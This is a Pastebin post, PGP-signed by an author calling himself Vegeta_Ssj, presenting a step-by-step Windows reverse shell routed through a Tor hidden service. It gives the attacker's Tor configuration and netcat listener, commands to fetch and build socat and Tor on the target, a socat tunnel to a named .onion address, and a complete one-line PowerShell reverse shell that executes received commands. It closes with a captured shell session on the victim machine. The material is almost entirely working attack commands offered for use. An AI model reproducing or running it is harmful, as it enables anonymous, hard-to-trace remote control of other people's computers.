Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -----BEGIN PGP SIGNED MESSAGE-----
- Hash: SHA512
- ___________________________________
- / Vegeta_Ssj : Windows Socat Hidden \
- \ Service Reverse Shell /
- -----------------------------------
- \ ^__^
- \ (oo)\_______
- (__)\ )\/\
- ||----w |
- || ||
- email: vegeta_ssj@riseup.net
- jid: vegeta@exploit.im / vegeta_ssj@4cjw6cwpeaeppfqz.onion
- Attacker (Linux):
- Run Tor Hidden Service:
- exploit@cockbox:~# sudo cat /etc/tor/torrc
- HiddenServiceDir /home/exploit/hidden_shell
- HiddenServicePort 8888 127.0.0.1:8888
- exploit@cockbox:~# tor
- Jun 27 17:14:46.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
- Jun 27 17:14:47.000 [notice] Bootstrapped 100%: Done
- exploit@cockbox:~# cat /home/exploit/hidden_shell/hostname
- 63uxwd4p56vswvyj4gcwvxzkkxzwwtz4lr2yc6w2nwkeniefmhli7xid.onion
- Run Netcat listener:
- exploit@cockbox:~# nc -lvp 8888 127.0.0.1
- listening on [any] 8888 ...
- Target:
- Download Cygwin and install with additional packages:
- https://www.cygwin.com/setup-x86_64.exe
- - - - - - - - - - - - - - - - - - - - - gcc-g++
- - - - - - - - - - - - - - - - - - - - - gcc-core
- - - - - - - - - - - - - - - - - - - - - cygwin32-gcc-g++
- - - - - - - - - - - - - - - - - - - - - cygwin32-gcc-core
- - - - - - - - - - - - - - - - - - - - - make
- Download Socat current version:
- $url = "http://www.dest-unreach.org/socat/download/socat-1.7.3.2.tar.gz";$output ="$pwd\socat.zip"
- Invoke-WebRequest -Uri $url -OutFile $output;Expand-Archive -LiteralPath $output
- Open Cygwin and compile Socat under Windows:
- tar zxvf socat-1.7.3.2.tar.gz
- cd socat-1.7.3.2
- ./configure
- make
- make install
- Download and run Tor from Windows Expert Bundle:
- $url = "https://www.torproject.org/dist/torbrowser/9.5/tor-win32-0.4.3.5.zip";$output ="$pwd\tor.zip"
- Invoke-WebRequest -Uri $url -OutFile $output;Expand-Archive -LiteralPath $output
- Run the Socat tunnel from the Hidden Service to the listening port on localhost:
- socat.exe TCP4-LISTEN:5555,reuseaddr,fork SOCKS4A:127.0.0.1:63uxwd4p56vswvyj4gcwvxzkkxzwwtz4lr2yc6w2nwkeniefmhli7xid.onion:8888,socksport=9050
- Send Powershell reverse shell to Socat listener on localhost:
- $client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',5555);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
- Enjoy:
- exploit@cockbox:~# nc -lvp 8888 127.0.0.1
- listening on [any] 8888 ...
- connect to [127.0.0.1] from localhost [127.0.0.1] 59496
- PS C:\Users\IEUser> whoami
- msedgewin10\ieuser
- Enjoy :)
- -----BEGIN PGP SIGNATURE-----
- iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl8KQWdfFIAAAAAALgAo
- aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2
- NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK
- CJbJlgQAh/6cS4lB3Jz1d2yxPwm334W990C4cmov9v+thlg/2Z9WYY8ecYRfD2GA
- WPf/4oSfxcILrE2WnXeZctqPWtqVUAMsRRiWW1heFYZ/gnTU6wEAQelpoNXQRtxc
- x+iPmTbkSc3K4/P4PwSTAwhorD89YaGoRKSotNmAaSeWBEFhUiA=
- =8W4Z
- -----END PGP SIGNATURE-----
Add Comment
Please, Sign In to add comment